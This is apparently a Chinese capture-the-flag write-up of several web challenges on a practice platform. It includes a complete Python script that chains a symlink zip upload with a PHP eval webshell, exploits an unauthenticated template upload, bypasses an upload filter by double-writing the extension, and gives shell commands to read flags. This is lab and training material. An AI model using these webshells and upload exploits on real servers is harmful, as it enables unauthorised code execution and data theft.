狗黑子最后的起舞
扫目录发现注册页面,登陆后什么也没有
发现其都在同一目录下再次进行目录扫描
发现存在git泄露
把文件下载下来
<?php
if (isset($_FILES['file'])) {
$f = $_FILES['file'];
if ($f['error'] === UPLOAD_ERR_OK) {
#将上传文件信息赋值给 $f,并判断上传过程是否出错(UPLOAD_ERR_OK 表示上传到临时目录成功)
$dest = '/etc/' . time() . '_' . basename($f['name']);
#试图将文件保存到 /etc/ 目录下。在 Linux 中,
#/etc/ 通常只有 root 权限才能写入。这暗示了该 Web 服务可能以 root 身份运行
#或者对该目录有特殊权限
if (move_uploaded_file($f['tmp_name'], $dest)) {
$escapedDest = escapeshellarg($dest);
exec("unzip -o $escapedDest -d /etc/ 2>&1");
#使用系统命令 unzip 解压刚才上传的文件
#-o 表示强制覆盖已有文件,-d /etc/ 表示解压到 /etc/ 目录
if ($code !== 0) {
exec("unzip -o $escapedDest -d /etc/ 2>&1");
}
#如果第一次解压返回状态码不为 0(失败),则再尝试解压一次
unlink($dest);
echo "ghz";
# 解压完成后,删除上传的原始压缩包,并输出字符串 "ghz" 表示完成
}
}
}我们整一个文件上传的页面
一个文件上传的后端,会把zip压缩包解压到/etc目录下,这里考察软链接
我们创建一个指向/var/www/html的软链接
ln -s /var/www/html
zip -y 1.zip html我们上传一个带有木马的压缩包
懒的话可以直接整个自动化脚本
import zipfile
import os
def create_symlink_zip(zip_name, link_name, target_path):
"""
Creates a zip file containing a symbolic link.
"""
with zipfile.ZipFile(zip_name, 'w') as zf:
zi = zipfile.ZipInfo(link_name)
zi.create_system = 3
zi.external_attr = 0xA1ED0000
zf.writestr(zi, target_path)
def create_payload_zip(zip_name, link_name, filename, content):
"""
Creates a zip file containing a file inside a directory named like the symlink.
"""
with zipfile.ZipFile(zip_name, 'w') as zf:
zf.writestr(os.path.join(link_name, filename), content)
if __name__ == "__main__":
create_symlink_zip("link.zip", "link", "/var/www/html")
create_payload_zip("shell.zip", "link", "shell.php", "<?php eval($_POST['cmd']); ?>")
print("Generated link.zip and shell.zip")
import requests
import os
import time
# 题目地址
TARGET_URL = "http://7efb8092-2773-49db-9d2e-adf6f1819a5a.www.polarctf.com:8090/ghzpolar/gouheizi.php"
BASE_URL = "http://7efb8092-2773-49db-9d2e-adf6f1819a5a.www.polarctf.com:8090/"
def upload(filename):
print(f"[*] Uploading {filename}...")
with open(filename, 'rb') as f:
files = {'file': (filename, f, 'application/zip')}
r = requests.post(TARGET_URL, files=files)
print(f"[+] Response: {r.text.strip()}")
return r.text
def check_shell():
# 尝试两个可能的 shell 路径
paths = ["shell.php", "ghzpolar/shell.php"]
for path in paths:
url = BASE_URL + path
print(f"[*] Checking shell at {url}...")
try:
r = requests.get(url, timeout=5)
if r.status_code == 200:
print(f"[!!!] Shell found at {url}")
# 简单测试一下 RCE
r_post = requests.post(url, data={'cmd': 'echo "pwned";'})
if "pwned" in r_post.text:
print("[!!!] RCE verified!")
return True
except Exception as e:
print(f"[-] Error checking {url}: {e}")
return False
if __name__ == "__main__":
# 1. 运行 gen_zip.py 生成压缩包
print("[*] Generating ZIP files...")
os.system("python gen_zip.py")
# 2. 上传 link.zip
upload("link.zip")
# 3. 上传 shell.zip
upload("shell.zip")
# 4. 验证
check_shell()
coke粉丝团
先来注册一个账号
成功登录我们需要是用钻石来买灯牌达到10级获取flag
有一个提示
可以看到每一个灯牌都有一个固定的图片名字,由此可以推出10级灯牌的名字为coke10.png
对页面进行爆破
在第52页面
随便买一个,修改为负数
应该是需要token
根据题目密钥应该是coke
对了
新年贺卡
<?php
require_once 'config.php';
require_once 'lib/CardGenerator.php';
require_once 'lib/TemplateManager.php';
if (!isset($_SESSION['user'])) {
$_SESSION['user'] = bin2hex(random_bytes(16));
}
$action = $_GET['action'] ?? 'home';
$generator = new CardGenerator();
try {
switch ($action) {
case 'generate':
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$template = $_POST['template'] ?? 'default';
$message = $_POST['message'] ?? '';
if (!TemplateManager::isValidTemplate($template)) {
throw new Exception("无效的模板选择");
}
$cardData = $generator->generateCard($template, $message);
$cardPath = $generator->saveCard($cardData);
echo "<h1>您的新年贺卡已生成!</h1>";
echo "<img src='$cardPath' alt='新年贺卡' style='max-width: 500px;'>";
echo "<p><a href='?action=download&file=" . basename($cardPath) . "'>下载贺卡</a></p>";
}
break;
case 'download':
$file = $_GET['file'] ?? '';
$filePath = UPLOAD_DIR . basename($file);
if (empty($file) || !is_file($filePath) || strpos($file, '../') !== false) {
throw new Exception("无效的文件请求");
}
header('Content-Type: image/png');
header('Content-Disposition: attachment; filename="newyear_card.png"');
readfile($filePath);
exit;
case 'admin':
if (isset($_GET['debug'])) {
$debug = $_GET['debug'];
if ($debug === 'show_templates') {
echo "<h1>模板列表</h1>";
$templates = TemplateManager::getAvailableTemplates();
echo "<pre>";
print_r($templates);
echo "</pre>";
echo "<h2>模板目录文件:</h2>";
echo "<pre>";
print_r(scandir(TEMPLATE_DIR));
echo "</pre>";
}
else if ($debug === 'add_template' && $_SERVER['REQUEST_METHOD'] === 'POST') {
$name = $_POST['template_name'] ?? '';
$content = $_POST['template_content'] ?? '';
try {
TemplateManager::addTemplate($name, $content);
echo "<p style='color: green;'>模板 '$name' 添加成功!</p>";
$filePath = TEMPLATE_DIR . $name . '.php';
if (file_exists($filePath)) {
echo "<p>文件路径: " . $filePath . "</p>";
echo "<p>文件权限: " . substr(sprintf('%o', fileperms($filePath)), -4) . "</p>";
}
} catch (Exception $e) {
echo "<p style='color: red;'>错误: " . $e->getMessage() . "</p>";
}
}
else if ($debug === '/** **/_form') {
echo "<h1>添加新模板</h1>";
echo "<form method='post' action='?action=admin&debug=add_template'>";
echo "<p>模板名: <input type='text' name='template_name' pattern='[a-z0-9_]+' required></p>";
echo "<p>模板内容:<br><textarea name='template_content' rows='10' cols='50' required></textarea></p>";
echo "<p><input type='submit' value='添加模板'></p>";
echo "</form>";
}
else if ($debug === 'view_template') {
$name = $_GET['name'] ?? '';
$path = TEMPLATE_DIR . $name . '.php';
if (file_exists($path)) {
echo "<h1>模板内容: $name</h1>";
echo "<pre>" . htmlspecialchars(file_get_contents($path)) . "</pre>";
} else {
echo "<p>模板不存在</p>";
}
}
} else {
echo "<h1>模板管理</h1>";
echo "<ul>";
echo "<li><a href='?action=admin&debug=show_templates'>查看模板列表</a></li>";
echo "<li><a href='?action=admin&debug=/** **/_form'>添加模板</a></li>";
echo "</ul>";
}
break;
case 'home':
default:
// 显示主页
$templates = TemplateManager::getAvailableTemplates();
?>
<!DOCTYPE html>
<html>
<head>
<title>新年贺卡生成器</title>
<meta charset="UTF-8">
<style>
body { font-family: Arial, sans-serif; max-width: 600px; margin: 50px auto; padding: 20px; background: #f5f5f5; }
.container { background: white; padding: 30px; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); }
h1 { color: #d32f2f; text-align: center; }
textarea { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; }
select { width: 100%; padding: 10px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; }
button { width: 100%; padding: 12px; background: #4CAF50; color: white; border: none; border-radius: 5px; cursor: pointer; }
</style>
</head>
<body>
<div class="container">
<h1>🎉 新年贺卡生成器 🎉</h1>
<form action="?action=generate" method="post">
<div>
<label for="message">祝福语:</label><br>
<textarea id="message" name="message" rows="4" required>新年快乐,万事如意!</textarea>
</div>
<div>
<label for="template">选择模板:</label><br>
<select id="template" name="template" required>
<?php foreach ($templates as $tpl): ?>
<option value="<?php echo $tpl; ?>"><?php echo ucfirst($tpl); ?></option>
<?php endforeach; ?>
</select>
</div>
<button type="submit">生成贺卡</button>
</form>
</div>
</body>
</html>
<?php
}
} catch (Exception $e) {
die("<h1>错误</h1><p>" . $e->getMessage() . "</p>");
}
?>
#在 case 'admin' 块中,程序没有任何登录验证
#要在 URL 传入 ?action=admin 即可直接进入 
$name = $_POST['template_name'] ?? '';
$content = $_POST['template_content'] ?? '';
try {
TemplateManager::addTemplate($name, $content);
// ... 后面会自动拼接 .php 并保存
}
#template_content 中写入 PHP 一句话木马
#设定文件名:template_name 设为 shell
#发送 POST 请求到 ?action=admin&debug=add_template
制作贺卡
成功获取flag
GET
一个上传页面文件名直接双写绕过
<?php $x = $_POST; @eval($x['cmd']); ?>
flag被隐藏了
cmd=system("cat ../0095c0930065b64d547f9794abac00ab.php");
<!--?php
if (__FILE__ === $_SERVER['SCRIPT_FILENAME']) {
die("Access Denied!");
}
echo "flag{73121d2832f501293a2e661c4d3a082f}";
?-->